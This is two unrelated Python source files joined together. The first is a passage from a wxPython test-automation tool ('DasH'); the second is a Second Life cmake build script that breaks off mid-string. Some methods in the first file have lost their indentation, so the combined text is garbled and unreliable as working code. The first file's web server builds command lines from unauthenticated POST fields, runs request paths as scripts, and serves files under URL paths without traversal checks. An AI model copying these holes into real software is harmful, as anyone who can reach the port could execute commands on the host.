                displaypath = cgi.escape(urllib.unquote(self.path))
                content='<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'
                content+="<html>\n<title>Directory listing for %s</title>\n" % displaypath
                content+="<body>\n<h2>Directory listing for %s</h2>\n" % displaypath
                content+="<hr>\n<ul>\n"
                content+='''
                    <SCRIPT>
                    function post( id, script, dest )
                    {
                        element = document.getElementById(id);
                        value = element.value
                        params = 'script='+encodeURI(script)+'&arg='+encodeURI(value)
                        var xmlhttp;
                        if (window.XMLHttpRequest)
                        {// code for IE7+, Firefox, Chrome, Opera, Safari
                            xmlhttp=new XMLHttpRequest();
                        }
                        else
                        {// code for IE6, IE5
                            xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');
                        }
                        xmlhttp.onreadystatechange=function()
                        {
                            if (xmlhttp.readyState==4 && xmlhttp.status==200)
                            {
                                alert(xmlhttp.responseText);
                                newHTML( xmlhttp.responseText);
                                setTimeout("window.close()",3000);
                            }
                        }
                        xmlhttp.open("POST",dest,true);
                        xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                        xmlhttp.send( params );
                    }
                    function newHTML(HTMLstring) {
                        //var checkitem = mygetCheckedItem();
                        //HTMLstring=post( 'manualtest','/cgi-bin/onSUTLIST.py', 'bedname='+encodeURI(checkitem) );
                        var newwindow=window.open();
                        var newdocument=newwindow.document;
                        newdocument.write(HTMLstring);
                        newdocument.close();
                    }
                    </SCRIPT>
                    <table>
                    '''
                for name in list:
                    extension = os.path.basename(name).split('.')[-1]
                    # NOTE(review): pattern is usually a list, so this
                    # membership test only matches when a bare string
                    # like '*' was passed -- confirm intended filtering
                    if pattern in ['', '*', '*.*']:
                        pass
                    elif extension in pattern:
                        pass
                    else:
                        continue
                    fullname = os.path.join(path, name)
                    displayname = linkname = name
                    # Append / for directories or @ for symbolic links
                    if os.path.isdir(fullname):
                        displayname = name + "/"
                        linkname = name + "/"
                    if os.path.islink(fullname):
                        displayname = name + "@"
                    # Note: a link to a directory displays with @ and links with /
                    input_button =""
                    filename = urllib.quote(linkname)
                    if not related_path.endswith('/'):
                        related_path+='/'
                    fullfilename =related_path+urllib.quote(linkname)
                    if related_path.startswith('/case') and os.path.isfile(fullname):
                        input_button = """
                        <input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
                        <input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunCase')";>"""%(filename,filename,fullfilename)
                    elif related_path.startswith('/suite') and os.path.isfile(fullname):
                        input_button = """
                        <input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
                        <input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunSuite')";>
                        </td></tr>\n"""%(filename,filename,fullfilename)
                    content+='<tr><td><a href="%s">%s</a></td><td>'% (related_path+urllib.quote(linkname), cgi.escape(displayname))+input_button
                content+="</table></ul>\n<hr>\n</body>\n</html>\n"
                return content
            def array2htmltable(self,Array):
                # Render a 2-D array as a numbered HTML table.
                content = "<table border='1' align='left' width=autofit >"
                for index , sublist in enumerate( Array):
                    content += ' <tr><td>\n%d</td><td>'%(index+1)
                    content += ' </td><td>'.join([x if x!='' else ' ' for x in sublist ])
                    content += ' \n</td></tr>\n'
                content += ' \n </table><br>'
                return content
            def show_content_by_path(self, path, type='csv'):
                # Render a file (csv rows become a table, other text becomes
                # paragraphs) or fall back to a directory listing, framed
                # by "Back to DasH" navigation.
                header = '''
                <table border="0" align='center' width="100%" >
                <tr> <td align=center valign=middle><a href="/">Back to DasH</a></td> </tr>
                </table>'''
                footer = header
                if os.path.isfile(path):
                    indexpage= open(path)
                    encoded=indexpage.read()
                    html = []
                    for line in encoded.split('\n'):
                        html.append('<p>%s</p>'%line.replace('\r', '').replace('\n',''))
                    encoded= ''.join(html)
                    if type in ['csv']:
                        ar =[]
                        for line in html:
                            row = line.split(',')
                            ar.append(row)
                        encoded = self.array2htmltable(ar)
                    # elif type in ['py']:
                    # ar =[]
                    # for line in html:
                    # row = line.split(',')
                    # ar.append(row)
                    # encoded = self.array2htmltable(ar)
                else:
                    encoded =self.list_dir(path, self.path, type)
                #encoded = "<html>{}</html>".format(cgi.escape(encoded))
                encoded =header+encoded.replace('\t', ' ').replace(' ', ' ') + footer
                return encoded
            def do_GET(self):
                # Route by URL prefix: /, /favicon.ico, /home, /sessions,
                # /case, /suite, /log, else treat as a path under root.
                root = self.root
                home = self.home
                suite_path = self.suite_path
                log_path = self.log_path
                response = 200
                type = 'text/html'
                if self.path=='/':
                    indexpage= open(home+ 'index.html', 'r')
                    encoded=indexpage.read()
                    encoded = encoded.encode(encoding='utf_8')
                elif self.path =='/favicon.ico':
                    indexpage= open(home+'dash.bmp', 'r')
                    encoded=indexpage.read()
                    type = "application/x-ico"
                elif self.path=='/home':
                    path = os.path.abspath(self.suite_path)
                    encoded =self.list_dir(path, './')
                elif self.path.startswith('/sessions'):
                    path = os.path.abspath(self.session_path)
                    path = path+ self.path[9:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path)
                elif self.path.startswith('/case'):
                    path = os.path.abspath(self.suite_path)
                    path = path+ self.path[5:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path, 'py')
                elif self.path.startswith('/suite'):
                    path = os.path.abspath(self.suite_path)
                    path = path+ self.path[6:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path, 'csv')
                elif self.path.startswith('/log'):
                    path = os.path.abspath(self.log_path)
                    print(path)
                    path = path+ self.path[4:]#replace('/log/','/')
                    encoded = self.show_content_by_path(path, '*')
                else:
                    path = os.path.abspath(root)
                    path = path+ self.path.replace('//','/')
                    if os.path.isfile(path):
                        from lib.common import csvfile2array
                        arrary = csvfile2array(path)
                        encoded = self.array2htmltable(arrary)
                    else:
                        encoded =self.list_dir(path, self.path)
                self.send_response(200)
                self.send_header("Content-type", type)
                self.end_headers()
                self.wfile.write(encoded)
            def LoadHTMLPage(self, filename, replace=[], Pattern4ESCAPE1='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT1#',Pattern4ESCAPE2='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT2#'):
                # Fill successive %s slots of an HTML template with the
                # items of *replace*, protecting any literal % signs in the
                # template via the two sentinel patterns.
                indexpage= open(filename, 'r')
                encoded=indexpage.read()
                encoded =encoded.replace('%s',Pattern4ESCAPE1 )
                encoded =encoded.replace('%',Pattern4ESCAPE2 )
                encoded =encoded.replace(Pattern4ESCAPE1,'%s' )
                for item in replace:
                    encoded =encoded.replace('%s', item, 1)
                encoded =encoded.replace(Pattern4ESCAPE2, '%' )
                return encoded
            def RunScript(self, script, args=None):
                # Queue a script for execution and answer with the
                # queue-confirmation text.
                if not args:
                    args =''
                exe_cmd = '%s %s'%(script,args)
                print('Run Script:'+exe_cmd)
                encoded = self.runner_proc(exe_cmd)
                #encoded ='run{}'.format(exe_cmd)
                self.send_response(200)
                self.send_header("Content-type", "text/html")#; charset=%s" % enc)
                self.end_headers()
                self.wfile.write(encoded)
            def ParseFormData(self, s):
                # Hand-rolled multipart/form-data parser: returns
                # (field name, bare file name, file data) or None when the
                # body does not look like a form upload.
                import re
                reP = re.compile('^(-+[\d\w]+)\r\n(.+)-+[\d\w]+-*', re.M|re.DOTALL)
                #s = '''-----------------------------186134213815046583202125303385\r\nContent-Disposition: form-data; name="fileToUpload"; filename="case1.csv"\r\nContent-Type: text/csv\r\n\r\n,ACTION,EXPECT,TIMEOUT,CASE OR COMMENTS\n[case1],,,,\n#var,\ncmd,${5}\ncmd2,${cmd2}\n#setup,,,,\ntel,pwd,],10\ntel,ls,],10,\n,ls,],10,\ntel,${cmd},],10,\n,${cmd2},],10,\n#!---,,,,\n\n\r\n-----------------------------186134213815046583202125303385--\r\n'''
                #rs = re.escape(s)
                rs =s
                m = re.match(reP, rs)
                print(rs)
                if m:
                    print('match!')
                    boundary = m.group(1)
                    print(m.group(2))
                    c = m.group(2)
                    index =c.find(boundary)
                    if index ==-1:
                        pass
                    else:
                        c = c[:index]
                    l = c.split('\r\n')
                    print(l)
                    attribute=l[0].split('; ')
                    da={}
                    la =attribute[0].split(':')
                    da.update({la[0]:la[1]})
                    for a in attribute[1:]:
                        la=a.split('=')
                        da.update({la[0]:la[1].replace('"','').replace('\'','')})
                    data = '\r\n'.join(l[3:-1])
                    filename = da['filename']
                    # keep only the base name, whichever separator the
                    # uploading browser used
                    if filename.find('\\')!=-1:
                        filename=filename[filename.rfind('\\')+1:]
                    else:
                        filename=filename[filename.rfind('/')+1:]
                    return (da['name'],filename,data)
                else:
                    print('not match')
                    return None
            def do_POST(self):
                # First try an urlencoded script/arg run request; on any
                # failure fall back to a form-data upload, then to running
                # the raw request path as a script.
                content_len = int(self.headers['Content-Length'])
                #self.queryString
                self.path
                s = self.rfile.read(content_len)
                encoded=''
                try:
                    s=str(s)
                    import urlparse
                    req = urlparse.parse_qs(urlparse.unquote(s))
                    script = '{}/{}'.format(self.suite_path, req['script'][0][7:])
                    if req.has_key('arg'):
                        arg= req['arg'][0]
                    else:
                        arg = ''
                    executefile =''
                    cmd_line = script+ ' '+ arg
                    encoded=self.runner_proc(cmd_line)
                    #print(encoded)
                    encoded = encoded.encode(encoding='utf_8').replace('\t', ' ').replace('\n','')
                    self.send_response(200)
                    self.send_header("Content-type", "text/html")#; charset=%s" % enc)
                    self.end_headers()
                    self.wfile.write(encoded)
                except Exception as e:
                    import traceback
                    print(traceback.format_exc())
                    response = self.ParseFormData(s)
                    if response:
                        type, filename, data =response
                        encoded = self.onUploadFile(type, filename, data)
                    else:
                        encoded ='ERROR: %s, Can\'t parse Form data: %s'%(str(e),s)
                        encoded= encoded.encode(encoding='utf_8')
                        try:
                            requestline = self.requestline
                            import re
                            reScript=re.compile('POST\s+(.+)\s+HTTP.*', re.DOTALL)
                            m= re.match(reScript, requestline)
                            if m:
                                returncode =self.RunScript(m.group(1),[])
                                encoded ='script %s completed with return code %d!'%(m.group(1), returncode)
                        except Exception as e:
                            encoded ='can\'t run script!'
                        encoded = encoded.encode(encoding='utf_8', errors='strict')
                # self.send_response(200)
                # self.send_header("Content-type", "text/html")#; charset=%s" % enc)
                # self.end_headers()
                # self.wfile.write(encoded)
        port =self.web_port
        home = __file__ #sys.argv[0]
        if os.path.exists(home):
            home = os.path.dirname(home)
        root = home
        home = home +'/html/'
        #done move runWebserver to DasH, and launch it at dash initialization
        class ThreadingHttpServer(ThreadingMixIn, HTTPServer):
            pass
        httpd=ThreadingHttpServer(('',port), HttpHandler)
        from socket import socket, AF_INET, SOCK_DGRAM, gethostname,SOL_SOCKET, SO_REUSEADDR, getfqdn#*
        try:
            # connecting a UDP socket (no traffic is sent) reveals the
            # local address the OS would route through
            hostip=''
            s = socket(AF_INET, SOCK_DGRAM)
            s.bind(("", 1234))
            #sq = socket(AF_INET, SOCK_DGRAM)
            s.connect(("10.0.0.4", 1234))
            domain = getfqdn()
            hostip = s.getsockname()[0]
            self.web_host = hostip
            self.SetTitle('DasH-{}:{}'.format(self.web_host, self.web_port))
            s.close()
        except Exception as e:
            import traceback
            msg = traceback.format_exc()
            print(msg)
            # NOTE(review): hostname is only bound in this except branch,
            # so the info() call below raises NameError on the success
            # path -- confirm whether that is relied upon
            hostname =gethostname()
        info("Server started on %s (%s),port %d....."%(hostname,hostip,port))
        #print('Process ID:%d'%os.geteuid())
        self.web_daemon= httpd
        on=1
        self.web_daemon.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, on)
        httpd.serve_forever()
        try:
            s.close()
        except:
            pass
def add_line_to_case_queue(self,line):
type_case, case_name, args = self.check_case_type(line)
if type_case in ['txt','csv']:
self.run_a_test_suite(line)
else:
self.case_queue.put(line)
return info('adding case to queue: {}'.format(line))
    def OnMouseMotion(self, evt):
        """Show a tooltip for the tree/list item under the mouse cursor.

        Uses the item's attached Data dict: an explicit 'tip' entry wins,
        otherwise the whole dict is pretty-printed.  Any failure (no item
        under the cursor, a page without HitTest, ...) is silently
        ignored so mouse handling never breaks the GUI.
        """
        try:
            active_page = self.navigator.GetCurrentPage()
            pos = self.case_suite_page.ScreenToClient(wx.GetMousePosition())
            item_index, flag = active_page.HitTest(pos)
            item_data = active_page.GetItemData(item_index)
            tip = active_page.GetToolTip()
            if item_data :
                if item_data.Data.has_key('tip'):
                    active_page.SetToolTipString(item_data.Data['tip'])
                else:
                    from pprint import pformat
                    tip_string = pformat(item_data.Data)
                    active_page.SetToolTipString(tip_string)
            # dead branch kept from an earlier experiment
            if False:
                if flag == wx.LIST_HITTEST_ONITEMLABEL:
                    active_page.SetToolTipString('Some information about ' + self.case_suite_page.GetItemText(item_index))
                else:
                    active_page.SetToolTipString('')
        except Exception as e:
            pass
        evt.Skip()
def on_keyboard_key_down(self,event):
event.Skip()
    @gui_event_decorator.gui_even_handle
    def on_generate_code(self, event):
        """GUI handler: dump generated test code into a timestamped .py file
        under the suite directory (':' and '.' made filename-safe)."""
        self.generate_code('{}/test_code_{}.py'.format(self.suite_path, datetime.now().isoformat().replace(':','-').replace('.','-')))
    def on_right_up_over_tab_in_edit_area(self, event):
        """Right-click on an editor tab: reopen its session in the background.

        The page's open(retry, interval) call can block, so it runs on a
        worker thread instead of the GUI thread.
        """
        x = event.GetEventObject()
        tabID = x.GetId()
        tab = x.FindWindowById(tabID)
        #session.session.open(retry, interval)
        #tab.open(3,15)
        th =threading.Thread(target=self.edit_area.GetCurrentPage().open, args=[1, 5])
        #index = self.edit_area.GetCurrentPage().open(1, 60)
        th.start()
        event.Skip()
        #self.edit_area.SetSelection(index)
def idle_process(self):
try:
self.on_handle_request_via_mail()
self.mail_failure =False
except Exception as e:
self.mail_failure =True
try:
self.check_case_status()
except:
pass
#print('{} i\'m idle !!!!!!!!!!!!!!!!!!'.format(datetime.now().isoformat()))
    def on_idle(self,event):
        """wx idle handler, throttled to run background work every ~3 seconds.

        Spawns worker threads for idle_process and the function-file
        update check so neither can block the GUI thread.
        """
        now = datetime.now()
        # minimum number of seconds between two background rounds
        max_idle=3
        if (now-self.last_time_call_on_idle).total_seconds()>max_idle:
            self.last_time_call_on_idle=now
            th=threading.Thread(target=self.idle_process, args=[])
            th.start()
            threading.Thread(target=self.check_whether_function_file_is_updated, args=[]).start()
    @gui_event_decorator.gui_even_handle
    def on_generate_test_report(self,event):
        """GUI handler: write the HTML report and print its web URL + body."""
        file_name='{}/dash_report_{}.html'.format(self.log_path, self.timestamp)
        report = self.generate_report(filename=file_name)#'{}/dash_report_{}.html'.format(self.log_path, self.timestamp))
        # prefix the report with the URL it is served at by the web daemon
        report = 'http://{}:{}/log/{}\n{}'.format(self.web_host, self.web_port, file_name.replace(self.log_path, ''),report)
        print(report)
    @gui_event_decorator.gui_even_handle
    def on_leftD_click_url_in_m_log(self, event):
        """Open a URL from the log window in the browser on double-click."""
        #print(urlString)
        mouseEvent = event.GetMouseEvent()
        if mouseEvent.LeftDClick():
            # the URL text is the range of the clicked hyperlink
            urlString = self.m_log.GetRange(event.GetURLStart(),event.GetURLEnd())
            webbrowser.open(urlString)
        event.Skip()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#done: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#done: 2017-08-19 run a script in DasH
#done: 2017-08-19 generate test report
#done: 2017-10-7 2017-08-19 publish all test cases in a web page
#done: 2017-10-7 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
    #done: 2017-08-19 build executable package for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
    #done: 2017-08-22 output in m_log window has a lot of empty lines, need to remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
    #done: 2017-10-7 2017-08-23 add tips for all tree items in the left panel
#done: 2017-10-7 2017-09-30 failed to send command to a session whose name start with numbers e.g. 1_session
# Traceback (most recent call last):
# File "C:/workspace/gDasH\gui\DasHFrame.py", line 588, in on_command_enter
# instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,args, globals())
# File "C:/workspace/gDasH\lib\common.py", line 153, in call_function_in_module
# eval('GetFunArgs({args})'.format(args=args_string))
# File "<string>", line 1
# GetFunArgs(35b)
# ^
# SyntaxError: invalid syntax
#todo: start thread for all gui event handlers with decoration, catch all exceptions
|
#!/usr/bin/env python
#
# @file develop.py
# @authors Bryan O'Sullivan, Mark Palange, Aaron Brashears
# @brief Fire and forget script to appropriately configure cmake for SL.
#
# $LicenseInfo:firstyear=2007&license=viewergpl$
#
# Copyright (c) 2007-2009, Linden Research, Inc.
#
# Second Life Viewer Source Code
# The source code in this file ("Source Code") is provided by Linden Lab
# to you under the terms of the GNU General Public License, version 2.0
# ("GPL"), unless you have obtained a separate licensing agreement
# ("Other License"), formally executed by you and Linden Lab. Terms of
# the GPL can be found in doc/GPL-license.txt in this distribution, or
# online at http://secondlifegrid.net/programs/open_source/licensing/gplv2
#
# There are special exceptions to the terms and conditions of the GPL as
# it is applied to this Source Code. View the full text of the exception
# in the file doc/FLOSS-exception.txt in this software distribution, or
# online at
# http://secondlifegrid.net/programs/open_source/licensing/flossexception
#
# By copying, modifying or distributing this software, you acknowledge
# that you have read and understood your obligations described above,
# and agree to abide by those obligations.
#
# ALL LINDEN LAB SOURCE CODE IS PROVIDED "AS IS." LINDEN LAB MAKES NO
# WARRANTIES, EXPRESS, IMPLIED OR OTHERWISE, REGARDING ITS ACCURACY,
# COMPLETENESS OR PERFORMANCE.
# $/LicenseInfo$
import errno
import getopt
import os
import random
import re
import shutil
import socket
import sys
import commands
import subprocess
class CommandError(Exception):
    """Raised when an external command run by the build script fails."""
    pass
def mkdir(path):
    """Create *path* and return it; return None if it already exists.

    An OSError other than "already exists as a directory" is re-raised.
    """
    try:
        os.mkdir(path)
        return path
    except OSError as err:
        # 'as err' (instead of the old py2-only comma form) is valid on
        # Python 2.6+ and 3.x alike.  Tolerate a pre-existing directory;
        # anything else is fatal.
        if err.errno != errno.EEXIST or not os.path.isdir(path):
            raise
def getcwd():
    """os.getcwd(), but with a DOS drive letter forced to uppercase.

    CMake wants drive letters in uppercase.  Full path names on other
    platforms always begin with a slash, so the lowercase-letter test
    never matches there and no explicit Windows check is needed.
    """
    cwd = os.getcwd()
    has_lowercase_drive = 'a' <= cwd[0] <= 'z' and cwd[1] == ':'
    if has_lowercase_drive:
        cwd = cwd[0].upper() + cwd[1:]
    return cwd
def quote(opts):
    """Return the options wrapped in double quotes and space-separated.

    Embedded double quotes are stripped rather than escaped; an empty
    sequence yields '""'.
    """
    cleaned = (opt.replace('"', '') for opt in opts)
    return '"%s"' % '" "'.join(cleaned)
class PlatformSetup(object):
    """Base class describing how to configure and drive a cmake build.

    Subclasses choose a cmake generator and override os()/arch()/
    run_build() for their platform.
    """
    generator = None
    build_types = {}
    for t in ('Debug', 'Release', 'RelWithDebInfo'):
        build_types[t.lower()] = t
    build_type = build_types['relwithdebinfo']
    standalone = 'OFF'
    unattended = 'OFF'
    universal = 'OFF'
    project_name = 'SecondLife'
    distcc = True
    cmake_opts = []
    word_size = 32
    def __init__(self):
        # Directory holding this script, resolved via the import system.
        self.script_dir = os.path.realpath(
            os.path.dirname(__import__(__name__).__file__))
    def os(self):
        '''Return the name of the OS.'''
        # BUG FIX: 'raise NotImplemented(...)' raised a TypeError because
        # NotImplemented is not callable; NotImplementedError is the
        # exception that was intended.
        raise NotImplementedError('os')
    def arch(self):
        '''Return the CPU architecture.'''
        return None
    def platform(self):
        '''Return a stringified two-tuple of the OS name and CPU
        architecture.'''
        ret = self.os()
        if self.arch():
            ret += '-' + self.arch()
        return ret
    def build_dirs(self):
        '''Return the top-level directories in which builds occur.
        This can return more than one directory, e.g. if doing a
        32-bit viewer and server build on Linux.'''
        return ['build-' + self.platform()]
    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        '''Return the command line to run cmake with.'''
        args = dict(
            dir=src_dir,
            generator=self.generator,
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            word_size=self.word_size,
            type=self.build_type.upper(),
            )
        #if simple:
        #    return 'cmake %(opts)s %(dir)r' % args
        return ('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
                '-DSTANDALONE:BOOL=%(standalone)s '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-G %(generator)r %(opts)s %(dir)r' % args)
    def run_cmake(self, args=[]):
        '''Run cmake in each build directory, creating them as needed.'''
        # do a sanity check to make sure we have a generator
        if not hasattr(self, 'generator'):
            # BUG FIX: this used to raise a *string* (itself a TypeError on
            # Python 2.6+) and referenced the non-existent self.__name__;
            # raise a real exception with the class name instead.
            raise CommandError("No generator available for '%s'"
                               % (type(self).__name__,))
        cwd = getcwd()
        created = []
        try:
            for d in self.build_dirs():
                simple = True
                if mkdir(d):
                    created.append(d)
                    simple = False
                try:
                    os.chdir(d)
                    cmd = self.cmake_commandline(cwd, d, args, simple)
                    print('Running %r in %r' % (cmd, d))
                    self.run(cmd, 'cmake')
                finally:
                    os.chdir(cwd)
        except:
            # If we created a directory in which to run cmake and
            # something went wrong, the directory probably just
            # contains garbage, so delete it.
            os.chdir(cwd)
            for d in created:
                print('Cleaning %r' % d)
                shutil.rmtree(d)
            raise
    def parse_build_opts(self, arguments):
        '''Split arguments into ([-o/--option values], remaining targets).'''
        opts, targets = getopt.getopt(arguments, 'o:', ['option='])
        build_opts = []
        for o, a in opts:
            if o in ('-o', '--option'):
                build_opts.append(a)
        return build_opts, targets
    def run_build(self, opts, targets):
        '''Build the default targets for this platform.'''
        # BUG FIX: NotImplementedError, not the NotImplemented singleton.
        raise NotImplementedError('run_build')
    def cleanup(self):
        '''Delete all build directories.'''
        cleaned = 0
        for d in self.build_dirs():
            if os.path.isdir(d):
                print('Cleaning %r' % d)
                shutil.rmtree(d)
                cleaned += 1
        if not cleaned:
            print('Nothing to clean up!')
    def is_internal_tree(self):
        '''Indicate whether we are building in an internal source tree.'''
        return os.path.isdir(os.path.join(self.script_dir, 'newsim'))
    def find_in_path(self, name, defval=None, basename=False):
        '''Locate an executable on PATH (or the subclass search_path).

        Returns [path] (or [basename] when requested), else [defval] when
        given, else [].  exe_suffixes/search_path come from subclasses.
        '''
        for ext in self.exe_suffixes:
            name_ext = name + ext
            if os.sep in name_ext:
                path = os.path.abspath(name_ext)
                if os.access(path, os.X_OK):
                    return [basename and os.path.basename(path) or path]
            for p in os.getenv('PATH', self.search_path).split(os.pathsep):
                path = os.path.join(p, name_ext)
                if os.access(path, os.X_OK):
                    return [basename and os.path.basename(path) or path]
        if defval:
            return [defval]
        return []
class UnixSetup(PlatformSetup):
    '''Generic Unixy build instructions.'''
    search_path = '/usr/bin:/usr/local/bin'
    exe_suffixes = ('',)
    def __init__(self):
        super(UnixSetup, self).__init__()
        self.generator = 'Unix Makefiles'
    def os(self):
        return 'unix'
    def arch(self):
        # Map the kernel's machine name onto the canonical CPU tag used
        # in build directory names.
        machine = os.uname()[-1]
        if machine.endswith('386'):
            return 'i386'
        if machine.endswith('86') or machine in ('athlon',):
            return 'i686'
        if machine == 'Power Macintosh':
            return 'ppc'
        if machine == 'x86_64' and self.word_size == 32:
            # a 32-bit build was requested on a 64-bit host
            return 'i686'
        return machine
    def run(self, command, name=None):
        '''Run a program.  If the program fails, raise an exception.'''
        sys.stdout.flush()
        status = os.system(command)
        if not status:
            return
        if name is None:
            name = command.split(None, 1)[0]
        # Decode the 16-bit wait status into a readable event description.
        if os.WIFEXITED(status):
            exit_code = os.WEXITSTATUS(status)
            if exit_code == 127:
                event = 'was not found'
            else:
                event = 'exited with status %d' % exit_code
        elif os.WIFSIGNALED(status):
            event = 'was killed by signal %d' % os.WTERMSIG(status)
        else:
            event = 'died unexpectedly (!?) with 16-bit status %d' % status
        raise CommandError('the command %r %s' %
                           (name, event))
class LinuxSetup(UnixSetup):
    """Linux build setup: picks viewer/server build dirs, g++ versions and
    distcc parallelism."""
    def __init__(self):
        super(LinuxSetup, self).__init__()
        # Debian sarge ships an older toolchain and needs g++-3.3
        try:
            self.debian_sarge = open('/etc/debian_version').read().strip() == '3.1'
        except:
            self.debian_sarge = False
    def os(self):
        return 'linux'
    def build_dirs(self):
        # Only build the server code if we have it.
        platform_build = '%s-%s' % (self.platform(), self.build_type.lower())
        if self.arch() == 'i686' and self.is_internal_tree():
            return ['viewer-' + platform_build, 'server-' + platform_build]
        elif self.arch() == 'x86_64' and self.is_internal_tree():
            # the viewer does not build in 64bit -- kdu5 issues
            # we can either use openjpeg, or overhaul our viewer to handle kdu5 or higher
            # doug knows about kdu issues
            return ['server-' + platform_build]
        else:
            return ['viewer-' + platform_build]
    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        # Build the cmake invocation; unlike the base class this also
        # chooses a compiler (optionally prefixed with distcc) and the
        # SERVER/VIEWER switches per build directory.
        args = dict(
            dir=src_dir,
            generator=self.generator,
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            type=self.build_type.upper(),
            project_name=self.project_name,
            word_size=self.word_size,
            )
        if not self.is_internal_tree():
            args.update({'cxx':'g++', 'server':'OFF', 'viewer':'ON'})
        else:
            if self.distcc:
                distcc = self.find_in_path('distcc')
                baseonly = True
            else:
                distcc = []
                baseonly = False
            if 'server' in build_dir:
                gcc = distcc + self.find_in_path(
                    self.debian_sarge and 'g++-3.3' or 'g++-4.1',
                    'g++', baseonly)
                args.update({'cxx': ' '.join(gcc), 'server': 'ON',
                             'viewer': 'OFF'})
            else:
                gcc41 = distcc + self.find_in_path('g++-4.1', 'g++', baseonly)
                args.update({'cxx': ' '.join(gcc41),
                             'server': 'OFF',
                             'viewer': 'ON'})
        cmd = (('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
                '-G %(generator)r -DSERVER:BOOL=%(server)s '
                '-DVIEWER:BOOL=%(viewer)s -DSTANDALONE:BOOL=%(standalone)s '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(opts)s %(dir)r')
               % args)
        # an explicit CXX in the environment wins over our choice
        if 'CXX' not in os.environ:
            args.update({'cmd':cmd})
            cmd = ('CXX=%(cxx)r %(cmd)s' % args)
        return cmd
    def run_build(self, opts, targets):
        """Run make in every build directory, choosing -j from any explicit
        -j option, else from the distcc host list (capped per host type)."""
        job_count = None
        # pick up an explicit -jN or '-j N' from the passed options
        for i in range(len(opts)):
            if opts[i].startswith('-j'):
                try:
                    job_count = int(opts[i][2:])
                except ValueError:
                    try:
                        job_count = int(opts[i+1])
                    except ValueError:
                        job_count = True
        def get_cpu_count():
            # count processors listed in /proc/cpuinfo
            count = 0
            for line in open('/proc/cpuinfo'):
                if re.match(r'processor\s*:', line):
                    count += 1
            return count
        def localhost():
            count = get_cpu_count()
            return 'localhost/' + str(count), count
        def get_distcc_hosts():
            # read the distcc hosts file, stripping comments; fall back to
            # $DISTCC_HOSTS or just localhost
            try:
                hosts = []
                name = os.getenv('DISTCC_DIR', '/etc/distcc') + '/hosts'
                for l in open(name):
                    l = l[l.find('#')+1:].strip()
                    if l: hosts.append(l)
                return hosts
            except IOError:
                return (os.getenv('DISTCC_HOSTS', '').split() or
                        [localhost()[0]])
        def count_distcc_hosts():
            # total (hosts, cpus); a host without /N counts as one cpu
            cpus = 0
            hosts = 0
            for host in get_distcc_hosts():
                m = re.match(r'.*/(\d+)', host)
                hosts += 1
                cpus += m and int(m.group(1)) or 1
            return hosts, cpus
        def mk_distcc_hosts(basename, range, num_cpus):
            '''Generate a list of LL-internal machines to build on.'''
            loc_entry, cpus = localhost()
            hosts = [loc_entry]
            dead = []
            stations = [s for s in xrange(range) if s not in dead]
            random.shuffle(stations)
            hosts += ['%s%d.lindenlab.com/%d,lzo' % (basename, s, num_cpus) for s in stations]
            cpus += 2 * len(stations)
            return ' '.join(hosts), cpus
        if job_count is None:
            hosts, job_count = count_distcc_hosts()
            hostname = socket.gethostname()
            if hosts == 1:
                # only localhost configured: synthesize a farm when running
                # on a known internal station/eniac machine
                if hostname.startswith('station'):
                    hosts, job_count = mk_distcc_hosts('station', 36, 2)
                    os.environ['DISTCC_HOSTS'] = hosts
                if hostname.startswith('eniac'):
                    hosts, job_count = mk_distcc_hosts('eniac', 71, 2)
                    os.environ['DISTCC_HOSTS'] = hosts
            if hostname.startswith('build'):
                max_jobs = 6
            else:
                max_jobs = 12
            if job_count > max_jobs:
                job_count = max_jobs;
            opts.extend(['-j', str(job_count)])
        if targets:
            targets = ' '.join(targets)
        else:
            targets = 'all'
        for d in self.build_dirs():
            cmd = 'make -C %r %s %s' % (d, ' '.join(opts), targets)
            print 'Running %r' % cmd
            self.run(cmd)
class DarwinSetup(UnixSetup):
    """Mac OS X build setup using the Xcode cmake generator."""
    def __init__(self):
        super(DarwinSetup, self).__init__()
        self.generator = 'Xcode'

    def os(self):
        return 'darwin'

    def arch(self):
        # Universal builds are reported as a pseudo-architecture.
        if self.universal == 'ON':
            return 'universal'
        else:
            return UnixSetup.arch(self)

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        args = dict(
            dir=src_dir,
            generator=self.generator,
            opts=quote(opts),
            standalone=self.standalone,
            word_size=self.word_size,
            unattended=self.unattended,
            project_name=self.project_name,
            universal=self.universal,
            type=self.build_type.upper(),
            )
        if self.universal == 'ON':
            # Replace the flag value with the actual cmake option text.
            args['universal'] = '-DCMAKE_OSX_ARCHITECTURES:STRING=\'i386;ppc\''
        #if simple:
        #    return 'cmake %(opts)s %(dir)r' % args
        return ('cmake -G %(generator)r '
                '-DCMAKE_BUILD_TYPE:STRING=%(type)s '
                '-DSTANDALONE:BOOL=%(standalone)s '
